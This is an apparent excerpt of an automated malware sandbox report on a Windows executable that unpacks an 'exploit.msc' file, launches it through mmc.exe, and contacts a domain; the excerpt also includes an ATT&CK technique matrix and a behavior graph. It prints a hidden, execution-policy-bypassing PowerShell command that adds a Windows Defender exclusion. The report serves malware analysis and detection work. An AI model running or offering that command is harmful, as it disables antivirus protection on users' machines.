Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A2B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A2B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\exploit.msc" Jump to behavior
Source: C:\Windows\System32\mmc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}Jump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A29D90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,CopySid,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_00007FF752A29D90
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A458E0 cpuid 0_2_00007FF752A458E0
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF752A2A2CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A30754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF752A30754
Source: C:\Users\user\Desktop\IPt9U27NoX.exeCode function: 0_2_00007FF752A151A4 GetVersionExW,0_2_00007FF752A151A4
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
Boot or Logon Initialization Scripts11
Process Injection
1
Disable or Modify Tools
LSASS Memory31
Security Software Discovery
Remote Desktop Protocol1
Clipboard Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
41
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS41
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync44
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636991 Sample: IPt9U27NoX.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 60 25 eatertoken.com 2->25 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Sigma detected: MMC Spawning Windows Shell 2->37 39 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->39 9 IPt9U27NoX.exe 3 10 2->9         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 14 mmc.exe 2 21 9->14         started        27 127.0.0.1 unknown unknown 11->27 process6 dnsIp7 29 eatertoken.com 172.67.191.12, 443, 49685, 49699 CLOUDFLARENETUS United States 14->29 41 Suspicious powershell command line found 14->41 43 Bypasses PowerShell execution policy 14->43 45 Adds a directory exclusion to Windows Defender 14->45 18 powershell.exe 27 14->18         started        signatures8 process9 signatures10 31 Loading BitLocker PowerShell Module 18->31 21 conhost.exe 18->21         started        23 WmiPrvSE.exe 18->23         started        process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.